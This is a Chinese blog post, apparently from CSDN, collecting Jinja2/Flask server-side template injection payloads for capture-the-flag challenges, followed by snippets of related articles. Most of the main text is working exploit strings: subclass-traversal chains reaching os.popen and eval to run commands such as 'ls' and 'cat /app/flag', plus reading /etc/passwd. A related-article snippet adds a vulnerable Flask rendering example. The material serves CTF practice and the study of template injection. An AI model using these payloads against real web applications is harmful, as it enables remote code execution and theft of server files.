ssti模板写法(续更)

已于 2024-12-24 14:31:05 修改
阅读量729 收藏 10
点赞数 27
文章标签: 安全性测试
于 2024-12-24 14:26:25 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_43473980/article/details/144693665
版权

首先进行一个简单判断,确实存在 SSTI 例如:${{44}}、{4*4}、{{44}}

参数可以通过字典爆破获得

读取当前的类别 ''.__class__

读取父类 ''.__class__.__base__

读取 object 下子类 ''.__class__.__base__.__subclasses__()

选择其中的一个子类 ''.__class__.__base__.__subclasses__()[数字]

初始化并且加载该类下可用的函数 ''.__class__.__base__.__subclasses__()[数字].__init__.__globals__

<class '_frozen_importlib_external.FileLoader'>79
''.__class__.__base__.__subclasses__()[117].__init__.__globals__‘popen’('ls').read()
//不加read()返回的是地址		117
先使用__builtins__加载内嵌函数,再调用内嵌函数
''.__class__.__base__.__subclasses__()[64].__init__.__globals__['__builtins__']['eval']
("__import__('os').popen('ls').read()")
//eval()里面就可以写python代码		64

比如文件读取 <class '_frozen_importlib_external.FileLoader'> 类下的 get_data 函数

''.__class__.__base__.__subclasses__()[79]["get_data"](0,'/etc/passwd')

{{''.__class__.__base__.__subclasses__()[117].__init__.__globals__'popen'('cat flag').read()}}

{{url_for.__globals__['__builtins__']['eval']("__import__('os').popen('cat flag').read()")}}

其中蓝色字体为执行命令,黄色字体为类下的函数,其中的数字根据题目而变化

实际用法

{{''.__class__.__base__.__subclasses__()[133].__init__.__globals__['popen']('ls').read()}}

{{''.__class__.__base__.__subclasses__()[133].__init__.__globals__['popen']('find / -name fl**').read()}}

{{''.__class__.__base__.__subclasses__()[133].__init__.__globals__['popen']('cat /app/flag').read()}}

北花
关注
PHP中的SSTI模板注入——Twig、Smarty、Blade
m0_61506558的博客
10-13 2060
最近接触到了SSTI注入的考点,里面涉及的内容比较杂,和SQL注入一样,影响的面较广,打算先从PHP模块注入开始,一步步深入学习。(一)TwigTwig是来自于Symfony的模版引擎,它非常易于安装和使用。Twig使用一个加载器 loader(Twig_Loader_Array) 来定位模板,以及一个环境变量environment(Twig_Environment) 来存储配置信息。
[BJDCTF2020]The mystery of ip(ssti模板注入题目)
m0_55109452的博客
06-02 2027
项目场景: 链接http://node3.buuoj.cn:29669/index.php 问题描述: 观察页面找到三个链接,点开flag和hint看看,发现flag那个页面窃取了客户端的ip地址,这题的题目是“The mystery of ip”IP的神秘,看来解题是要从这里入手了。 尝试解决: 既然是窃取了IP,考虑是不是XFF或Client-IP这两个header,发现这个IP确实可控,0.0,感觉可以冲了 我想到的第一个就是之前看到的sql注入的http头注入,但是也只是想想罢了,再看看其他方
python 类继承 baseclass_Python 类继承,__bases__, __mro__, super
weixin_39796652的博客
12-05 614
Python是面向对象的编程语言,也支持类继承。>>> class Base:... pass...>>> class Derived(Base):... pass这样就定义了两个类,Derived继承了Base。issubclass(a,b)能够測试继承关系:>>> issubclass(Derived, Base)True在Python中,...
SSTI模板注入
m0_74013288的博客
11-12 134
SSTI引发的真正原因:render_template渲染函数的问题。ssti服务端模板注入,ssti主要为python的一些框架 jinja2 mako tornado django,PHP框架smarty twig,java框架jade velocity等等使用了渲染函数时,由于代码不规 范或信任了用户输入而导致了服务端模板注入,模板渲染其实并没有漏洞,主要是程序员对代码不规范 不严谨造成了模板注入漏洞,造成模板可控。
ctfshow SSTI 知识点总结
绮洛Ki1ro的博客
08-08 1108
ctfshow web入门 SSTI知识点总结
ctfshow web入门 SSTI
2301_79442654的博客
03-16 385
返回一个包含Python中所有类的列表,这些类都是直接或间接从。选择了列表中的第133个元素(因为索引是从0开始的)。属性,可以获得一个字典,其中包含。类的基类列表,其中第一个元素是。命令,这个命令通常用于读取名为。类定义时可用的所有全局变量。从全局变量字典中获取名为。提示“名字就是考点”
SSTI(模板注入)
xiaolong22333的博客
02-28 1648
概念性的东西这里就不讲了,毕竟像我这种刚开始学ssti,且没什么Python基础的小白来说,要是一上来就巴拉巴拉讲一堆概念,可能直接就懵了。 首先认识一下这个东西 __class__ 它可以用来查看变量所属的类 什么意思呢?动手试一下就知道了。用命令行打开python,输入''.__class__ 可以看到输出了<class 'str'>,表明这是str类,当然还有另外的类型,可以依次输入().__class__,[].__class__,{}.__class__ str(字符串)、di.
web安全-SSTI模板注入漏洞
weixin_61956136的博客
07-31 3990
web安全-SSTI模板注入漏洞
SSTI例题buu[Flask]SSTI
cuddlylm的博客
04-08 3413
方法一:手注 打开只有这个 访问http://your-ip/?name={{233233}},得到54289,说明它执行了我们的命令,SSTI漏洞存在。 这里的54289是233233的运算结果 获取eval函数并执行任意python代码的POC: {% for c in [].__class__.__base__.__subclasses__() %} {% if c.__name__ == 'catch_warnings' %} {% for b in c.__init__.__globals_
关于flask的SSTI注入
Kr的博客
01-21 7368
ssti注入又称服务器端模板注入攻击(Server-Side Template Injection),和sql注入一样,也是由于接受用户输入而造成的安全问题。 它的实质就是服务器端接受了用户的输入,没有经过过滤或者说过滤不严谨,将用户输入作为web应用模板的一部分,但是在进行编译渲染的过程中,执行了用户输入的恶意代码,造成信息泄露,代码执行,getshell等问题。 这个问题主要是出在web应...
python内置类属性_Python中SSTI相关内置类属性
weixin_39580041的博客
11-23 306
0x01前言最近做到各种SSTI,其中对于Python中的各种内置类属性以及相关的函数没有弄得太清楚,在这里总结学习一下。0x02背景对于Python,其设计之初就是一门面向对象的语言,对于其中的类和对象,继承(支持多继承)有许多相关的内置属性以及相关函数。这里列出其中经常遇见,可以利用的(可能不是很全,会不断补充):__class__ 对象的的__class__指明了所属类型,即返回一个实例...
SSTI模板注入总结
热门推荐
Manuffer的博客
10-13 1万+
文章目录一、初识SSTI二、判断SSTI类型三、常用类1、__class__2、__bases__3、__subclasses__()4、类的知识总结(转载)5、常见过滤器(转载)四、CTF例题[BJDCTF]The mystery of ip[Bugku]Simple_SSTI_1 一、初识SSTI 1、什么是SSTISSTI就是服务器端模板注入(Server-Side Template Injection),实际上也是一种注入漏洞。 可能SSTI对大家而言不是很熟悉,但是相信大家很熟悉SQL注入。实
python沙箱逃逸一些套路的小结
Sp4rkW的博客
05-21 1万+
前言 总结一下各大赛事中的沙箱逃逸题,感觉还是很好玩的~ 先说一下自己对于这种沙箱逃逸题的理解吧,关键在于绕过,一般就是逼你用一些特别的操作去绕过他ban掉的函数,得到flag 空说无意,我们直接来看比赛中的一些题目~ 2018 ciscn(国赛)题RUN 它过滤了一些危险函数,比如:os、sys等等,但我们可以通过类的继承关系找到被ban掉的库,然后将它导入进来。比如: ().__c...
class.__mro__、class.mro()、class.__subclasses__()的使用举例
敲代码的小风
01-10 992
参考链接: class.__mro__ 参考链接: class.mro() 参考链接: class.__subclasses__() 实验代码展示: # class Person(): # class Person(object): # class Person: class Person: # class Person(object): # class Person: # class Person(): 这三种写法都是可以的 '''定义基类Person''' def __init__(s
解网鼎杯一道web题(Calc)
洞若观火
08-23 2510
探测:roboot.txt 回显: Traceback (most recent call last):   File "/usr/local/lib/python2.7/dist-packages/tornado/web.py", line 1520, in _execute     result = self.prepare()   File "/usr/local/lib/python2....
系分论文《论软件系统的安全性测试方法》
pccai的博客
05-23 1025
本文从软件安全测试的视角出发,结合项目的实际需求,系统阐述了渗透测试、漏洞评估等关键技术的应用过程。
机械工程中圆锥滚子轴承载荷分布曲线程序及其动力学模型验证 v1.5
05-30
内容概要:本文介绍了一款用于计算圆锥滚子轴承载荷分布曲线的程序。该程序旨在与圆锥滚子轴承的动力学模型(如有限元模型和自建代码动力学模型)进行对比,以验证模型的有效性和准确性。作者基于《滚动轴承设计原理》一书编写了这一程序,并在代码中加入了详尽的注释,便于读者对照书籍进行学习和推导。此外,文中还提供了部分代码片段,展示了如何计算载荷分布并绘制相应的曲线图。最后,作者分享了编写程序的学习心得,强调了这一工具在轴承设计和优化中的重要性。 适合人群:机械工程领域的研究人员和技术人员,尤其是那些对圆锥滚子轴承的载荷分布和动力学模型感兴趣的从业者。 使用场景及目标:① 验证圆锥滚子轴承动力学模型的有效性;② 提供一个实用的工具,帮助理解和优化圆锥滚子轴承的性能;③ 作为教学资源,辅助学生和初学者学习相关理论和编程技巧。 其他说明:本文不仅提供了具体的编程实现方法,还分享了宝贵的学习经验和心得,鼓励读者在实践中不断探索和创新。
基于OpenCV与QT开发的卡尺工具:工具跟随、自动纠偏、图像处理与形状匹配集成应用
05-30
内容概要:本文介绍了基于OpenCV与Qt开发的智能卡尺工具,该工具集成了图像采集、图像处理和自动纠偏功能,旨在提升工业制造中的测量精度和效率。文中详细阐述了系统的架构与功能,包括工具跟随、找线、找圆、颜色检测、形状匹配等高级功能。此外,还讨论了技术实现细节,如形状匹配与找线找圆算法的封装、Qt界面开发以及海康工业相机的集成。最后,强调了该系统作为学习资料的价值,涵盖计算机视觉、图像处理和Qt开发等方面。 适合人群:从事工业自动化、计算机视觉、图像处理和Qt开发的技术人员,尤其是希望深入了解图像处理技术和实际应用场景的研发人员。 使用场景及目标:适用于需要精确测量和图像处理的工业环境,如制造业生产线的质量检测环节。目标是提高测量精度和效率,减少人为误差。 其他说明:该系统不仅是一个实用的测量工具,也是一个宝贵的学习资源,提供了完整的源码和技术文档,有助于开发者深入理解和掌握相关技术。
MATLAB Simulink中两相交错并联双向DC-DC变换器的双闭环控制仿真及性能分析 · 仿真分析
最新发布
05-30
内容概要:本文详细探讨了两相交错并联双向DC-DC变换器在MATLAB/Simulink环境下的电压电流双闭环控制仿真模型。文中介绍了基于4mos结构的变换器模型,并对其三种控制方式——单电压环开环控制、单电流环闭环控制和电压电流双闭环控制进行了详细的仿真和性能对比。研究表明,双闭环控制在电感电流均流、输出波形平滑度和电压纹波抑制等方面表现最优,显著提高了系统的稳定性和效率。 适合人群:从事电力电子领域的研究人员和技术人员,尤其是对DC-DC变换器及其控制策略感兴趣的读者。 使用场景及目标:适用于需要深入了解DC-DC变换器控制策略的研究人员和技术人员,帮助他们选择最合适的控制方式以提升系统性能。 其他说明:本文提供了丰富的仿真数据和图表,有助于读者直观地理解不同控制方式的效果。此外,附有参考文献,方便读者进一步查阅相关资料。
ssti绕过
03-09
### SSTI漏洞绕过方法 服务器端模板注入(SSTI)是一种严重的Web应用程序安全漏洞,允许攻击者通过操纵输入来执行任意代码。为了有效防御SSTI攻击,开发人员通常会采用多种防护机制,如转义特殊字符、限制表达式语法等。 然而,在某些情况下,如果实现不当或者存在逻辑缺陷,仍然可能存在绕过的可能性[^1]: #### 1. 利用未被过滤的关键字 一些框架可能只简单地替换了常见的危险函数名称(例如`exec()`),而忽略了其他具有相似功能但不同命名方式的方法。因此可以尝试寻找这些替代方案并加以利用。 #### 2. 绕过字符串编码检测 当应用层面对用户提交的数据进行了HTML实体化处理时,可以通过双写法(`{{'a'*0}}`)或者其他变种形式规避此类检查规则[^2]。 #### 3. 使用环境变量或内置对象 许多现代编程语言提供了丰富的标准库支持以及预定义好的全局变量/常量表;了解目标平台特性有助于发现潜在可利用之处。 ```python # Python Jinja2案例演示 class Config(object): DEBUG = True app.config.from_object(Config) @app.route('/ssti') def ssti(): name = request.args.get('name', '') template = Template("Hello " + name) return template.render() ``` 上述Python Flask程序片段展示了如何配置Jinja2模版引擎,并接收来自HTTP请求参数中的数据作为渲染上下文的一部分。假设该服务开启了调试模式,则可通过精心构造payload触发远程命令执行风险[^3]。 请注意,研究和测试任何类型的软件弱点都应在合法授权范围内进行,未经授权访问他人计算机信息系统属于违法行为!
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值